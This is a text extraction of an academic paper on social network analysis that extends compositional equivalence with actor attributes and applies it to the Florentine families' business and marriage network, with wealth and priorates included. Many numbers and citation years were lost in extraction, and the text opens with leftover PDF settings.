/colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
compositional equivalence with actor attributes: positional analysis of the florentine families network
j. antonio rivero ostoic, university of san simón, cochabamba, bolivia

abstract
this paper extends compositional equivalence – a structural correspondence type intended for multiplex networks – by incorporating actor attributes into the modeling of the network relational structure as diagonal matrices. as an illustration, we construct the positional system of the florentine families network with business and marriage ties together with relevant characteristics acquired by the actors, such as the families' financial wealth and the number of priorates they held. different representations of the cumulated person hierarchies reveal that adding wealth to the modeling provides a more accurate picture of what the substantial narrative says about this network.

correspondence concerning this work should be addressed to antonio rivero ostoic phd, associate researcher, centro de estudios superiores, university of san simón, cochabamba, bolivia; rivero.antonio@gmail.com; github.com/mplex

introduction
relationships among actors in a defined collective scheme are the primary source of information for social network analysis. ties not only make the network structure but also provide the basis for the characterization of underlying processes occurring in the social system. although social networks are typically characterized by a single type of relationship, social life is more complex, and people are embedded in 'different' kinds of ties that are interlocked within the network relational structure. these sorts of arrangements are known as multiplex networks, and the associated relational structure of such social systems is typically reduced onto positional systems to facilitate a useful substantial interpretation. a key issue in the reduction process is to preserve the multiplicity of the ties, since the way different ties are intertwined provides important information about the network structure. in this spirit, breiger and pattison ( ) proposed a type of equivalence among the network members that is built on local role algebras for the creation of the positional system.

the goal of this paper is to extend this type of correspondence by suggesting an effective way to incorporate the attributes of the actors and their relationships into a single relational system representing the multiplex network structure. one important reason for such integration is that social conduct in networks does not always institute a link between individual subjects, and attribute-based information about the actors is often not ascribed to them, but depends on the individual's own choices or circumstances. examples of actor attributes are the acquisition of a certain characteristic from the social environment, such as innovation adoption; the acquisition of a certain attitude; the non-compulsory affiliation to a group; the individual's personal wealth and political power, etc. such attributes can play a significant role in the network relational structure and should be incorporated into the modeling process.

algebra for multiplex networks
representing social relations and actor attributes in an integrated system requires a formal definition of the social network concept. a social network comprises a set of social actors $N = \{i \mid i \text{ is an actor}\}$ measured under a collection of social relations $R = \{\langle i,j \rangle \mid i \text{ 'has a tie to' } j\}$, with $\langle i,j \rangle$ being an ordered pair.
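as a small illustration of the definition just given, the sketch below builds the adjacency matrix of a toy network from a set of ordered pairs. the actors and ties are invented, and the code is a python illustration only, not part of the original analysis (which relies on r packages).

import numpy as np

actors = ["a", "b", "c", "d"]                             # hypothetical actor set N
ties = [("a", "b"), ("b", "c"), ("c", "a"), ("c", "d")]   # ordered pairs in R

index = {name: k for k, name in enumerate(actors)}
X = np.zeros((len(actors), len(actors)), dtype=int)
for i, j in ties:
    X[index[i], index[j]] = 1        # x_ij = 1 iff i 'has a tie to' j

print(X)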
a binary relation $x_{ij} = 1$ represents a tie between actors $i$ and $j$ in $R$, whereas $x_{ij} = 0$ denotes the lack of a tie. the pairs on $N$ are stored in an adjacency matrix of size $n \times n$. a multiplex network is a collection of $r$ different kinds of relations measured over $N$. in this case each relational type is stored in a separate adjacency matrix, and these matrices are stacked together into a single array of size $n \times n \times r$. moreover, the actors and their ties are also represented by nodes and differentiated edges, respectively, in a graphical device called a multigraph, in which the relational levels are depicted in parallel rather than being collapsed into bold edges representing multiplex ties.

each element in the array constitutes a generator tie that produces compound relationships among the network members through relational composition, and compound ties can be concatenated as well. for instance, 'the friend of a colleague' comes from the generators 'friend of' and 'colleague of', etc. both generators and compounds are referred to as strings in relational structures.

representation of attributes
one of the theses of this paper is that non-ascribed attributes of the actors in the network can be an integrated part of the relational structure, which is typically represented by a semigroup of relations (boorman and white, ; pattison, ). in this sense, the incorporation of the changing attributes of the actors implies that subjects sharing a characteristic constitute a subset of self-reflexive ties associated with the social system, represented in a matrix format that can be combined with the other elements in the relational structure.

in formal terms, actor attributes are represented by the elements of a diagonal matrix $A$ where each value is defined as $a_{ij} = \alpha_i \, \delta_{ij}$. accordingly, for a given attribute defined in $N$, and for $i = 1, 2, \ldots, n$, the possible values of the first variable in the right-hand expression are $\alpha_i = 1$ if the attribute is tied to actor $i$, and $\alpha_i = 0$ otherwise. on the other hand, $\delta_{ij}$ is defined for nodes $i, j = 1, 2, \ldots, n$ in $N$ by the delta function or kronecker delta, with $\delta_{ij} = 1$ for $i = j$ and $\delta_{ij} = 0$ for $i \neq j$. as a result, the general representation of $A$ constitutes a diagonal matrix of the form $A = \mathrm{diag}(\alpha_1, \alpha_2, \ldots, \alpha_n)$ that records as self-relationships the attributes of the total number of actors in the system. in other words, the 'possession' of the attribute produces a reflexive closure in the respective element of the system.

the establishment of the indexed diagonal matrix implies that each type of attribute considered for the actors in the network is represented by its own array, and it constitutes an additional generator in the relational structure. when all network members share a given attribute, the result will be an identity matrix without any structural effect, whereas when none of the actors possesses the characteristic, the representation will be a null matrix with an annihilating effect where no composition is possible. clearly, we are mainly interested in the differentiation of the actors who share an attribute from those who do not share the trait, because the resulting matrix, which is neither a neutral nor an absorbing element in the algebraic structure, has structuring consequences in the network relational system.
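a minimal sketch, in python rather than the multiplex r package used by the author, of how generator ties compose into compound strings and how an indexed diagonal matrix enters as an additional generator; all matrices and the attribute vector are hypothetical.

import numpy as np

def compose(x, y):
    # boolean relational composition: (x o y)[i, j] = 1 iff some k
    # has x[i, k] = 1 and y[k, j] = 1
    return ((x @ y) > 0).astype(int)

# two hypothetical generators: c = 'colleague of', f = 'friend of'
c = np.array([[0, 1, 0, 0],
              [0, 0, 1, 0],
              [0, 0, 0, 0],
              [0, 0, 0, 0]])
f = np.array([[0, 0, 0, 0],
              [0, 0, 0, 1],
              [0, 0, 0, 1],
              [0, 0, 0, 0]])

cf = compose(c, f)            # 'friend of a colleague': a c-tie followed by an f-tie

# indexed diagonal matrix for an attribute held by actors 0 and 2 only;
# composing it with a social tie keeps the rows (or columns) of the holders,
# so it is neither a neutral nor an absorbing element
alpha = np.array([1, 0, 1, 0])
a = np.diag(alpha)
print(compose(a, c))          # ties sent by attribute holders
print(compose(c, a))          # ties received by attribute holders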
equivalence in multiplex networks
although the concatenation of social ties used in the construction of the partial order structure is well established (boorman and white, ; pattison, ), there are caveats when producing algebraic systems with the diagonal matrices representing actor attributes. for instance, since social interactions are typically measured without loops and are represented by adjacency matrices with empty diagonals, these cannot be contained in an attribute relation under this form of representation. however, by grouping actors who are structurally equivalent, it is possible to obtain collective self-relations.

for example, take relations c and a (and f) below. relation c has three maximally connected actors that make a clique configuration, but only a couple of them share attribute a. intrinsically, this means that the network of c relations includes system a and certainly not the other way around, but in the given example there is no such containment, and this does not reflect the reality of the network.

(the matrices for relations c and f and for attribute a are not reproduced here.)

a solution to this issue is to group the structurally equivalent actors in the network, which is the same as categorising actors with similar patterns of relationships. for instance, the first two actors are structurally equivalent (according to the definition made by lorrain and white, ) because they are identically related in both social relations (c and f), and they even share the same attribute. as a result, the first two actors make up a single class, and the associations in the system now echo the inclusion of a within c, thanks to the reflexive character of the first class of actors.

(the grouped matrices for c, f, and a are likewise not reproduced here.)

structural equivalence is the most stringent type of correspondence. since its formal definition, significant relaxations have been proposed for social networks, notably automorphic equivalence (everett, ; winship and mandel, ), regular equivalence (sailer, ; white and reitz, ), and generalized equivalence (doreian et al., , ). a common characteristic among these correspondence types is that they take a global perspective, because the standpoints of the entire set of actors within the social system are taken into account simultaneously in the modeling process. another distinctive feature of these equivalences is that they were originally designed for simple networks, and there is as yet no formal treatment for multiple structures.

while the grouping of the actors in social networks usually applies some relaxation to the equivalence criterion, in the case of multiplex networks it is desirable to preserve the multiplicity of the ties in the network reduction. although it is possible to collapse the different levels into multiplex ties and then apply a global equivalence as with simple networks, significant information gets lost by discarding the multiplicity of the ties. hence, in order to get a single structure representing a multiplex network, we need to combine the distinct levels of the relationship, which is feasible by considering the individual perspectives in the modeling.

local role equivalence
as an alternative to a global equivalence in the reduction of multiplex networks, we can apply a local perspective in the type of correspondence used in the establishment of classes. this means that the standpoints of individual actors are taken separately, rather than together, in the definition of similarity among the network members in structural terms.
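before turning to the details of local equivalences, the grouping of structurally equivalent actors described earlier in this section can be approximated by hashing each actor's row and column patterns across every relational level. the sketch below is a python simplification of the lorrain and white definition (it does not discount the dyad's own entries), and the toy data are invented.

import numpy as np

def structural_classes(relations):
    # group actors whose outgoing and incoming ties coincide in every relation
    n = relations[0].shape[0]
    classes = {}
    for i in range(n):
        profile = tuple(np.concatenate([np.r_[r[i, :], r[:, i]] for r in relations]))
        classes.setdefault(profile, []).append(i)
    return list(classes.values())

# actors 0 and 1 relate identically in both relations c and f
c = np.array([[0, 0, 1], [0, 0, 1], [1, 1, 0]])
f = np.array([[0, 0, 1], [0, 0, 1], [0, 0, 0]])
print(structural_classes([c, f]))   # -> [[0, 1], [2]]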
in addition, the local equivalences available within social network analysis make it possible to consider not only the primitive relations at the different levels but also the compound relations that go beyond the immediate neighbours of the actor. this is yet another difference compared to the global equivalence types.

to recognize local equivalences among the actors we rely on a three-dimensional array, similar to the one defined earlier, where the primitive ties of the network and the compound relations are stacked together. a partially ordered structure by increasing relation, similar to the array shown in figure , has been proposed by winship and mandel ( ) for the definition of local equivalences; they called this device a relation-box. figure shows a shadowed horizontal 'slice' across the string relations for the outgoing ties of a single actor (the first one in this case), which reflects that actor's activity linked to the rest of the members through the different string relations, both primitives and compounds, occurring in the network.

a horizontal slice in the relation-box is called a relation plane, and it encodes the distinct primitive and compound relations that a single actor has with the rest of the network members. for each network member there is a vector through the length of the relation plane representing a role relation of that member as seen from the focal actor. the set of distinct role relations defines the role set of the focal actor, and hence there is one role set for each actor in the network, obtained when the duplicated role relations are removed (wasserman and faust, ; winship and mandel, ).

figure : relation-box with an emphasized relation plane and its role relations.

a local role equivalence is also a way to characterize social roles in incomplete and in ego-centred networks while preserving the distinction of diverse types of relationships. besides, winship and mandel ( ) point out that local role equivalence is a generalisation of automorphic equivalence, in the sense that both kinds of equivalence involve the same types of role relations. automorphic equivalence would require not only the same types of role relations but also the same number of such relations, which implies equal role sets and local role algebras among correspondent actors (pattison, ).

although the relation-box theoretically permits compound relations of infinite length, the actors would not be aware of long chains of relations in their surrounding social environment. thus, on practical or substantial grounds, it is possible to perform the analysis with a 'truncated' version of this array whose third dimension counts the different primitive and compound ties up to a length pre-defined by the researcher.

compositional equivalence
breiger and pattison ( ) developed a structural correspondence aimed at multiplex networks that is based on the individual perspectives of the actors. although this equivalence type is referred to in the literature as 'ego algebra' (wasserman and faust, ), we call it compositional equivalence (ce) since compound relations are taken into account. thus, with ce the analysis of local roles uses the information expressed in the different relation planes of the relation-box corresponding to particular network members, whose rows and columns represent – according to the authors – the dual structure of the actors and their relations.
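the relation-box and role sets just described can be sketched as a three-dimensional boolean array. the code below is a rough python illustration under the assumption that compounds are truncated at length two; the generator matrices are invented stand-ins, not the data analysed in the paper.

import numpy as np
from itertools import product

def compose(x, y):
    return ((x @ y) > 0).astype(int)

def relation_box(generators, max_len=2):
    # stack the generators and their compounds up to max_len into an n x n x z array
    strings = list(generators)
    frontier = list(generators)
    for _ in range(max_len - 1):
        frontier = [compose(a, g) for a, g in product(frontier, generators)]
        strings.extend(frontier)
    return np.stack(strings, axis=2)

def role_set(rbox, i):
    # distinct role relations seen from actor i: the columns of i's relation plane
    plane = rbox[i, :, :].T               # rows: string relations, columns: alters
    return {tuple(plane[:, j]) for j in range(plane.shape[1])}

m = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]])   # hypothetical marriage-like tie
b = np.array([[0, 0, 1], [0, 0, 0], [1, 0, 0]])   # hypothetical business-like tie
rbox = relation_box([m, b])
print(rbox.shape)        # (3, 3, 6): two generators plus four length-2 compounds
print(len(role_set(rbox, 0)))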
while such an approach characterizes the local role equivalence type, there is a step forward from a purely local perspective in the equivalence definition, since all the information from particular role relations is generalized to the entire network structure. the fact that ce generalizes local roles to the entire system implies that this type of correspondence works both at the local and at a 'global' level. that is, the establishment of roles and positions in the network is made from the perspectives of individual actors, whereas the characterization of equivalence itself is made by considering the relational features that are common to all members in the network. however, this last feature works better with middle-sized networks, and hence ce can be regarded as a local to 'middle-range' type of correspondence (pattison, personal communication).

the local portion of ce lies in the actors' particular views of the system in terms of inclusions among the role relations of the actors' immediate neighbours. recall that the role relations are recorded in the columns of the individual relation planes, which means that there is one such vector for each actor in every relation plane, each with as many entries as there are string relations up to the chosen length.

isolated actors in a multiplex network are unable to 'see' any type of relationship among other actors through the defined links. this implies that the role relations for isolates are empty no matter the type of tie or its length, and that all role relations in their relation plane are blank as well. connected actors, however, have a different perspective, from which there are inclusions among other actors. the collection of inclusions (or the lack of them) perceived by each actor or class is reflected in a square array of size $n \times n$, called a person hierarchy, belonging to this entity.

in more formal terms, from the standpoint of a given actor $i$, actor $j$ is 'contained within' actor $k$ whenever, for each string between $i$ and $j$, there is a same type of string between $i$ and $k$ (cf. breiger and pattison, , p. ). furthermore, the collection of all inclusions perceived by $i$ represents the person hierarchy $H_i$, which is defined for actors $i, j, k \in N$ and the role relations $r^*$ of $i$'s relation plane as:

$h_i(j,k) = 1$ iff $r^*(i,j) \leq r^*(i,k)$
$h_i(j,k) = 0$ iff $r^*(i,j) \not\leq r^*(i,k)$
$h_i(j,k) = 0$ iff $\sum r^*(i,j) = 0$

the last proposition implies that there is no inclusion between actors $j$ and $k$ in the person hierarchy of $i$, either due to the lack of containment among these actors or simply because actor $j$ has an empty role set. notice as well that there is a perceived mutual containment among actors in a given relation plane when their role relations are identical, i.e. $j \leftrightarrow k$ iff $r^*(i,j) = r^*(i,k)$.

on the other hand, the global part of ce arises with the union of the different person hierarchies into a cumulated person hierarchy across actors. this means that the cumulated hierarchy is represented by a single square matrix of size $n \times n$ having the properties of a partially ordered structure, namely reflexivity, antisymmetry, and transitivity. the structural information in the cumulated person hierarchy lays the foundations for categorizing the actors and performing a reduction of the network that – as breiger and pattison ( ) pointed out – comes from the zeros, or the absence of inclusions, among the different actors. the partition of the network itself is then a product of a global type of equivalence performed on the cumulated person hierarchy.
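a sketch of the person hierarchies and their cumulation as read from the definitions above. this is an illustrative python interpretation, not the author's code; the tiny hand-built relation-box used at the end is hypothetical.

import numpy as np

def person_hierarchy(rbox, i):
    # h[j, k] = 1 when, from actor i's relation plane, the role relation of j
    # is contained in that of k; an empty role relation yields no inclusion
    plane = rbox[i, :, :]                  # rows: alters, columns: string relations
    n = plane.shape[0]
    h = np.zeros((n, n), dtype=int)
    for j in range(n):
        for k in range(n):
            if plane[j].any() and np.all(plane[j] <= plane[k]):
                h[j, k] = 1
    return h

def cumulated_person_hierarchy(rbox):
    # union of all individual person hierarchies into a single partial order
    n = rbox.shape[0]
    big_h = np.zeros((n, n), dtype=int)
    for i in range(n):
        big_h |= person_hierarchy(rbox, i)
    return big_h

rbox = np.zeros((3, 3, 2), dtype=int)
rbox[0, 1, 0] = rbox[1, 0, 0] = 1      # a reciprocated tie on the first level
rbox[0, 2, 1] = 1                      # a one-way tie on the second level
print(cumulated_person_hierarchy(rbox))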
however, we should bear in mind that this matrix does not represent social ties as the adjacency matrices do, but constitutes a partial order structure indicating the lack of containments among the network members. hence, we assess classes of actors in the network according to their placement in such a graded system, which can be visualized through a lattice structure intended for partially ordered sets. in the next section we illustrate the process of constructing the local and global hierarchies in detail with an example of the reduction of a multiplex network. as in breiger and pattison ( ), we study the classic florentine families network dataset and, like the authors, we apply ce in the reduction of this social system.

florentine families network
the florentine families network dataset (breiger and pattison, ; kent, ; padgett and ansell, ) corresponds to a group of families from florence who had a leading role in the creation of the modern banking system in early th-century europe. there are two types of social ties in the network, corresponding to business and marriage relations among the prominent florentine families, two of which stand out as particularly powerful rivals: the medici and the strozzi. the ties of this network are undirected, which does not present any problem for the marriage ties but is unfortunate for the business relations: a circumstance that was remedied by breiger and pattison ( ) in their analysis by including measures of power such as the families' wealth and the number of priorates they held. (the data were retrieved from http://moreno.ss.uci.edu/data#padgett.)

figure depicts the network as a multigraph where different shapes of the edges represent the two kinds of relations. we note in the picture that eight bonds combine business and marriage ties in the system, and that the network has one component and a single isolated actor, the pucci family. a force-directed layout algorithm (fruchterman and reingold, ) has been applied to the graph to avoid crossing edges and to group closely related actors together. the visualisation gives us initial insights into the general social structure where actors are linked; however, we need to implement some computations if we want to look at the network relational structure in a form where the different types of tie are interrelated.

a crucial part of the modelling of multiplex networks is the reduction of the social system, because the corresponding relational structure represented by the semigroup is typically large and complex, even for small arrangements. for instance, breiger and pattison ( , p. ) report a semigroup of large order for the florentine families network, and this is only considering the two generator relations without attributes. certainly, it is necessary to work with a more manageable structure in order to obtain better insights into its logic of interlock. the reduction of the network implies constructing a relational structure based on a system of roles and positions, which leads to the role structure of the network. thanks to its reduced size, the network role structure is typically a more convenient configuration for a substantial interpretation of the multiplex network structure than the 'raw' relational arrangement of the system.
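the size of the semigroup mentioned above can be appreciated with a short sketch that closes a set of boolean generator matrices under relational composition. the generators below are arbitrary stand-ins, not the padgett business and marriage matrices, so the printed count is only illustrative.

import numpy as np

def semigroup_size(generators, max_rounds=100):
    # count the distinct string relations obtained by closing the
    # generators under boolean relational composition
    gens = [g.astype(np.uint8) for g in generators]
    elems = {g.tobytes(): g for g in gens}
    frontier = list(gens)
    for _ in range(max_rounds):
        new = []
        for a in frontier:
            for g in gens:
                c = ((a @ g) > 0).astype(np.uint8)
                if c.tobytes() not in elems:
                    elems[c.tobytes()] = c
                    new.append(c)
        if not new:
            break
        frontier = new
    return len(elems)

m = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]])
b = np.array([[0, 0, 1], [0, 0, 0], [1, 0, 0]])
print(semigroup_size([m, b]))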
a key aspect in the creation of the role structure is to preserve the multiplicity of the ties, and we know that local role equivalences allow us to combine the different levels of the relationships. next, we categorize the actors in the florentine families network in terms of ce with actor attributes as generator relations. the first step is to look at the structure produced by the actors' views of their neighbours' relations in terms of inclusions, and then we perform the modelling to produce the network positional system for an a posteriori analysis of the network role structure.

constructing person hierarchies
applying ce in the reduction of a multiplex network structure implies the construction of the relation-box, which provides the basis of the local part of this type of correspondence. recall that the relation-box is defined by the number of actors in the network and the number of string relations that make up the actors' immediate social ties and, eventually, the combinations of these. then all inclusions from the individual perspectives are combined into a single matrix that stands for the global part of ce.

figure : multigraph of the florentine families network. solid edges are marriage relations, dashed edges are business ties, and node size reflects the families' financial wealth. plot made with a force-directed layout of the multigraph r package (ostoic, b).

to illustrate the process of constructing person hierarchies we restrict the analysis to the smallest case of the relation-box, with no compounds, so that for the florentine families network the dimensions are $n \times n \times r$ with the two generator ties only. when we look at figure , we see that, apart from pucci, the actor with the lowest number of connections is the acciaiuoli family, a pendant actor with a single (reciprocated) tie to the medici family. for the direct contacts in the network without compounds, this means that the personal hierarchy of acciaiuoli includes just their immediate neighbour, the medici family, and hence the only inclusion in the matrix is a reflexive closure corresponding to this neighbour, while all the other possibilities lack containment. for a two-chain relationship, the person hierarchy of acciaiuoli includes the neighbouring ties of the medici family
for the florentine families network, the structure of is represented by the universal matrix and it makes no differentiation among the actors until it reaches a chain of relations of length . it is only from chains of relations with length or more that produces a distinction this is disregarding the isolated actor. among the actors that is a product of their particular inclusions expressed in . the partial order structure representing is given in table , and this set of ordering relations has been reported by breiger and pattison ( , p. ). this cumulated person hierarchy presents two categories of actors in the network plus the isolated family. one category corresponds to the actors who contain other network members without being contained in them, whereas the other category groups those who are merely contained in other actors without containing them. the partition of this system almost fits the requirements of structural equivalence, except for the case of the ginori family, which is positioned in the same class as the acciaiuoli, albizzi, ridolfi, and strozzi families, even though this actor is not implicated in any inclusions with the rest of the members in this class other than a self- containment. therefore, the positional system can have either two classes of collective actors plus the isolated actor or four classes with pairwise individual positions connections compositional equivalence | volume | issues & | insna.org in the system. regardless of the option chosen, both reduced arrangements seem to be good representations of the network structure in terms of the patterned social relations, and they serve as the basis for the construction of the role structure of the florentine families network. however, a number of attributes from the actors may play a significant part in the establishment of the network positional system, and hence we continue the rest of the analysis of this network by incorporating actor attributes in the establishment of the network role structure. . incorporating family attributes the core motivation for this paper is to incorporate in the modelling of the network relational structure significant actor characteristics, which do not have a structural character; that is, traits that are inherent to the actors and do not depend directly on their embedment in the network, such as individual centrality measures, dyadic attributes, etc. on the other hand, although actor attributes can be independent variables, they are not ascribed to the actors in the same way as age, gender or other demographic information, but are governed by the action of the actors themselves. the belief is that these kinds of actor attributes should be part of the modelling of the network positional system and also of the establishment of role structure when the attribute has a structural effect. in the case of the banking families, the power and influence of these families in the th century constitute significant characteristics. table gives the wealth and the number of priorates of the florentine families as reported in wasserman and faust ( , p. ), and these two attribute types, either together or naturally, extreme cases, e.g. when all or no actors share the attribute, will not have an influence on the final structure since they are represented by the identity and the null matrix, respectively. individually, are candidates for the modelling of the network positional system and subsequent role structure. 
for this type of analysis each attribute is represented with an indexed matrix; hence reducing the network structure with the actor attributes resembles the process we just applied to the marriage and business relations with ce, except that now there are additional generators to the social ties representing the attributes. we note in table that each category has two columns, one for the absolute values and another that marks the limits of these values according to a cut-off value. in one case we differentiate the very wealthy families from the ‘modestly’ rich actors in the network by adopting a cut-off value of , lira, which approximates the average of their financial resources. on the other hand, as regards the number of priorates, it seems reasonable to assume that the lack of information implies that these actors did not have a large number of jurisdictions at that time, if at all, and the cut-off lies in the average of the accessible number of priorates that is rounded to . as a result, there are two vectors of binary values that make the diagonal of the indexed matrices representing the actor attributes, which are additional generators for constructing the network relational structure. we continue the analysis of the banking network by applying ce for grouping the actors in the construction of the positional system with actor attributes. the difference is that now the relation- box on which the person hierarchies are based includes the additional generators representing the attribute-based information. since indexed matrices only have information on their diagonals, the different person hierarchies in the network actually, the mean is . , and the lamberteschi family lies in this limit, but rounding the cut-off value to makes more sense for the analysis. compositional equivalence connections insna.org | issues & | volume | table : wealth and number of priorates of the florentine families wealth > number of ⪆ (× lira) priorates (avg.) acciaiuoli albizzi barbadori na bischeri castellani ginori na guadagni lamberteschi medici pazzi na peruzzi pucci ridolfi salviati strozzi tornabuoni na include self-containments whenever the actor has the attribute. for example, while the person hierarchy of acciaiuoli for immediate ties comprises just the medici, with actor attributes it will include the acciaiuoli family itself when because this particular actor is politically very powerful with a number of priorates larger than the average. naturally, the rest of the actors in the network will follow the same logic, and the arrangement of the cumulated person hierarchy will be affected by the different personal views on inclusions, which are restructured due to the presence of actor attributes. figure shows in a graphic mode for the banking network with business and marriage ties together with wealth, number of priorates, and both actor attributes combined. these pictures are lattices known as hasse diagrams, which depict the inclusion levels in the hierarchy where the lower bound elements are contained in the upper bound elements whenever there is a link among them. for instance, in each diagram the inclusion ties of the medici family contain the inclusion ties of the acciaiuoli and the pazzi families, whereas in any of the cases there is a containment relation among these last two actors. 
it is important to note, however, that although the different levels in the hasse diagrams try to reflect the ranks in the partial order structures, there can be ambiguities in the placements depending on the diagram structure. for example, the guadagni family is always placed in the most intermediary level of the diagrams in figure , but in a couple of cases this actor does not contain any other actor in . likewise barbadori – similar to medici and peruzzi – cover other actors due to their inclusion ties, and this is without being contained by any network member, and perhaps it may be better to depict these actors at the same level in the three cases. all partial orders shown are emerging structures with the smallest value of . this means that there are ‘zeros’ among connected actors in with compounds of such lengths, which allows us to rank classes of actors according to the ce criteria. in the case of the actors' wealth, the structure of remains unaltered after compounds of length , but in the other two cases the cumulated person hierarchies involve a lower number of inclusions with larger . however, connections compositional equivalence | volume | issues & | insna.org shorter chains of relations imply more truthful individual viewpoints than ordered systems with longer compounds, and they are therefore preferred. these diagrams very clearly show that the attributes of the actors, such as their monetary wealth and political power, have an impact on the relational structure of this particular network. if we look at the diagrams in figure , we note that there is a further differentiation in the network in all three cases when considering actor attributes in the modelling. apart from the isolated actors, whose personal hierarchy corresponds to the null matrix, the cumulated person hierarchy for wealth clearly involves three levels, whereas there are five levels in the diagrams for the number of priorates, and for the two attributes together. as a result, the positional system with wealth differentiates three categories of actors plus the isolated node where the largest class in the previous classification is now divided into two categories. thus the personal wealth has a structuring influence in the network, and this makes a lot of sense; the richest actor of the banking network is the strozzi family, which is no longer in the same class as the acciaiuoli, albizzi, and ridolfi families, but is placed in another category with other actors having much more social and financial capital. when we look at the number of priorates there is even more differentiation in than we saw when just considering the wealth of the actors. apart from the families who contain most of the network members, i.e. the actors ‘at the top’ (medici, peruzzi, barbadori), and conversely the actors ‘at the bottom’ (pazzi, acciaiuoli, guadagni) who are contained in the rest of the network component, there is ambiguity with the rest of the actors and they can be classed in different ways. we get a similar picture when both attributes are taken together, as in figure with wealth and priorates, where the ‘top’ and ‘bottom’ actors in the diagram representing remain unambiguously placed, whereas the categories of the actors inbetween require interpretation. theory can guide us in the establishment of the categories in the positional system in the two last cases. 
we also need to determine which of the resulting role structures that are a product of the positional system provides the best insights into the relational interlock of the multiplex network structure. this task constitutes one of the last steps in the modelling of the system and we look at the reduced relational structures of the banking families’ network. . positional system of the florentine families network the main challenge in establishing the positional system of the network is to find the sets of collective relations that produce the most meaningful network role structure, i.e. a reduced system that provides an insight into the logic of interlock of the network relations. this is typically achieved with the role structure having the smallest possible dimensions. the logic of interlock is a kind of rationality that is shaped by different algebraic constraints expressed in the final relational structure where the different types of ties and the relevant actor attributes are interrelated in this case. although the class membership with the wealth attribute with three defined classes of collective actors seems straightforward, there are ambiguities both as regards the number of priorates and when the two features are combined. such uncertainties arise because a number of actors in the network can be classed in different ways according to their respective locations in the partial order structures of , and for the time being we concentrate our analysis on the two cases where political power is involved. hence, assuming that the isolated actor of the network forms its own class, we need to categorize the eight actors that are neither at the ‘top’ nor at the ‘bottom’ of the compositional equivalence connections insna.org | issues & | volume | hierarchies shown in figure with wealth and priorates, and in both arrangements the placement of the actors at the different levels aims to reflect the set of containments in the partial order structures with an aesthetic representation in the lattice. now we look closer at the inbetween actors in the two hierarchies where political power is involved. from table we obtain the assignment of these families with respect to the two attributes, and the next upper and lower vectors give the categories for wealth and number of priorates, respectively: certainly, one possibility is that all these actors are grouped together into a single class irrespective of their economic or political power, and in this way we have a positional system with three categories of collective actors for both priorates, and also for wealth and priorates. the arrangements of roles for business and marriage are then equal and all the positions are represented by actors who are both very wealthy and powerful in political terms (of course disregarding pucci). this means that the two attribute types are represented in the positional system by identity matrices with no structuring effect in the system of roles. in order to have an effect from wealth and the number of priorates on the role structure, we need to make a differentiation between classes of actors with respect to these attributes, and this is only possible by having characteristic strings not acting as neutral elements in the construction of the semigroup of relations. 
a straightforward way to achieve a structuring effect of diagonal matrices is that is why barbadori and guadagni, for example, who are unequivocally part of the same class as the top and bottom actors, respectively, are located at intermediary lev- els in the diagram. by separating the actors with ‘ones’ in the intermediate category from the actors with ‘zeros’ in the vector corresponding to this attribute type. hence we end up with a positional system that has four categories of collective actors, and for the number of priorates (the second row), for instance, bischeri, castellani, ginori, lamberteschi and tornabuoni will make their own class. this means that the attribute string is no longer represented by an identity matrix and the semigroup of the role structures for business, marriage, and number of priorates will record different compounds of social roles with class attributes. however, the role structure for priorates (not shown here) ends up being relatively large and complex. conversely, if we model the network relational system with both attributes at the same time, we first differentiate strozzi, which is a very powerful family both politically and economically. second we differentiate castellani and ginori, actors who are neither very wealthy nor have much political power. by grouping the last two actors into a single class we again avoid having the identity matrix, and the role structure of the network in this case has fewer representative strings, which means that we expect a more tractable substantial interpretation of the role interlock than when just considering the priorates. the fact that the role structure gets smaller rather than larger, as one would expect with another generator, is because the two social roles and both class attributes are equated, and the relational structure of the positional system is then based on just two generators. when we equate roles or attributes we get a poorly informative role structure where we need to interpolate the albizz bische castel ginori lamber ridolf salvia strozz tornab connections compositional equivalence | volume | issues & | insna.org figure : hasse diagrams of for the florentine banking network with actor attributes top to bottom: with wealth, ; with number of priorates, ; with wealth and priorates, . plots made with the multiplex (ostoic, c) and rgraphviz packages (hansen et al., ). compositional equivalence connections insna.org | issues & | volume | roles and collective characteristics in the analysis. a third possibility is to combine the business and 